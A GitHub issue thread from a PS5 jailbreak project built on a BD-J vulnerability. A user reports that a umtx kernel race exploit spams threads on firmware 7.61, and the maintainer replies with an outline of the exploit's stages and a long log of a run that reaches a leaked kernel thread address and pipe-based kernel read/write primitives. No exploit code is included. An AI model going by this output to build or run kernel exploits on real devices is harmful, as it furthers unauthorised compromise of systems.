hammer-83 / ps5-jar-loader

Remote JAR Loader for PS5, using BD-J vulnerability
67 stars 8 forks source link

umtx bug spams infinitely and doesn't work on any fw #2

Closed zecoxao closed 1 month ago

zecoxao commented 1 month ago

i see an infinite spam of threads on 7.61 and nothing happens, help!

hammer-83 commented 1 month ago

So couple of things:

  1. It sometimes takes 1000s of iterations before stage1 gets the shm overlap.
  2. Afterwards, it may or may not be able to get kernel memory.
  3. If it does not - it repeats the process from the start.
  4. If it does, it will do some reads from memory, print the address of kernel thread and crash.

For this reason, I suggest:

hammer-83 commented 1 month ago

For reference, this is a partial output I get after the race is triggered:

[INFO] [JarLoader] [main] Number of successful destructions: 2
...
[INFO] [JarLoader] [main] Spraying and praying
...
[INFO] [JarLoader] [main] Checking for shared memory object corruption
[INFO] [JarLoader] [main] Original descriptor of primary shared memory object: 41
[INFO] [JarLoader] [main] Lookup descriptor of primary shared memory object: 41
[INFO] [JarLoader] [main] Size of primary shared memory object: 0x2b000
[INFO] [JarLoader] [main] Calculated descriptor #43
[INFO] [JarLoader] [main] Got mismatch of descriptors!
[INFO] [JarLoader] [main] Checking succeeded, winner descriptor of shared memory object: 43
[INFO] [JarLoader] [main] Closing descriptor #42 of reclaim shared memory object #0
[INFO] [JarLoader] [main] Truncating shared memory object with descriptor #43
...
[INFO] [JarLoader] Got memory corruption after 223 iterations
[INFO] [JarLoader] Doing post-exploitation
[INFO] [Thread-135] [destroyer#0] Finishing loop
[INFO] [Thread-136] [destroyer#1] Finishing loop
[INFO] [Thread-137] [lookup] Finishing loop
...
[INFO] [JarLoader] Mapping memory of shared memory object with lookup descriptor #41
[INFO] [JarLoader] Mapped address of potential kernel stack: 0x21478c000. Size: 0x4000
[INFO] [JarLoader] Protecting mapped memory of potential kernel stack
[INFO] [JarLoader] Starting reclaim threads
[INFO] [JarLoader] Reclaim threads started
[INFO] [JarLoader] Checking if reclaimed memory belongs to controlled thread
[INFO] [JarLoader] Found marker pattern in kernel stack at 0x6bc
[INFO] [JarLoader] Classifying leaked kernel addresses
[INFO] [JarLoader] Determined reclaim job index: 2
[INFO] [JarLoader] Found reclaim thread 'reclaim#2' using 1 attempts
[INFO] [JarLoader] Found potential kernel thread address: 0xffffa2c373114ce0
[INFO] [JarLoader] [main] Resetting ready flag
[INFO] [JarLoader] Joining reclaim threads
[INFO] [Thread-141] [reclaim#3] Not target thread
...
[INFO] [Thread-140] [reclaim#2] I am lucky
...
[INFO] [Thread-140] [reclaim#2] Reading from read pipe #29
[INFO] [JarLoader] [main] Attempting to unlock pipe for kernel primitives
[INFO] [JarLoader] Writing to write pipe #30
[INFO] [JarLoader] Writing to write pipe #30 finished with result 4096
[INFO] [JarLoader] [main] Pipe for kernel primitives unlocked
[INFO] [JarLoader] [main] Waiting for command processor to start up
[INFO] [Thread-140] [reclaim#2] Reading from read pipe #29 finished with result 4096
[INFO] [Thread-140] [reclaim#2] Starting command processor loop
[INFO] [JarLoader] [main] Done waiting for command processor to start up
[INFO] [JarLoader] Leaked kernel thread name: reclaim#2
[INFO] [JarLoader] Kernel thread address is correct
zecoxao commented 1 month ago

thanks for the output. closing...